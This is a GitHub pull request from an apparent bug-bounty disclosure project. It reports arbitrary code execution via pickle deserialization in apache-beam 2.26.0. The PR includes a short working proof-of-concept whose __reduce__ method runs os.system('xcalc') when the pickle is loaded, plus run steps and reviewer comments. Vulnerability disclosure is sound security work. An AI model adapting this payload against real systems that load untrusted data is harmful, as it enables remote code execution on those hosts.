Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Arbitary code execution apache beam #1564

Closed
wants to merge 4 commits into from
Closed

Arbitary code execution apache beam #1564

wants to merge 4 commits into from

Conversation

Anon-Artist
Copy link
Contributor

Description

Apache Beam is a unified model for defining both batch and streaming data-parallel processing pipelines, as well as a set of language-specific SDKs for constructing pipelines and Runners for executing them on distributed processing backends, including Apache Flink, Apache Spark, Google Cloud Dataflow and Hazelcast Jet.

  • Vulnerability description
    untrusted loading of data by the pickle.load function leading to Arbitrary code execution.

Proof of Concept

Run exploit.py

import os
import pickle
#os.system('pip3 install apache-beam==2.26.0')
from apache_beam import coders
#payload formation
class ArbitraryCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
#exploiting
dumps = pickle.dumps(ArbitraryCode())
coders.coders.maybe_dill_loads(dumps)
  • pip3 install apache-beam==2.26.0
  • python3 exploit.py

@huntr-helper huntr-helper added the disclosure Vulnerability disclosure label Jan 8, 2021
Anon-Artist
Anon-Artist commented Jan 8, 2021
View reviewed changes
Copy link
Contributor Author

@Anon-Artist Anon-Artist left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Package renamed

mzfr
mzfr reviewed Jan 8, 2021
View reviewed changes
Copy link

@mzfr mzfr left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM!

mufeedvh
mufeedvh approved these changes Jan 9, 2021
View reviewed changes
Copy link
Contributor

@mufeedvh mufeedvh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM

JamieSlome
JamieSlome reviewed Jan 10, 2021
View reviewed changes
bounties/pip/beam/1/vulnerability.json Outdated
},
"Package": {
"Registry": "pip",
"Name": "beam",
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Rename to: https://pypi.org/project/apache-beam/, both Name and the directory structure, thanks! 🍰

Anon-Artist
Anon-Artist commented Jan 10, 2021
View reviewed changes
Copy link
Contributor Author

@Anon-Artist Anon-Artist left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done @JamieSlome

@Anon-Artist
Copy link
Contributor Author

The vulnerability is intended
418sec/flink#1 (comment)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@JamieSlome JamieSlome JamieSlome left review comments

@mzfr mzfr mzfr left review comments

@mufeedvh mufeedvh mufeedvh approved these changes

@bbeale bbeale Awaiting requested review from bbeale

@Mik317 Mik317 Awaiting requested review from Mik317

Assignees
No one assigned
Labels
disclosure Vulnerability disclosure
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@Anon-Artist @mzfr @mufeedvh @JamieSlome @huntr-helper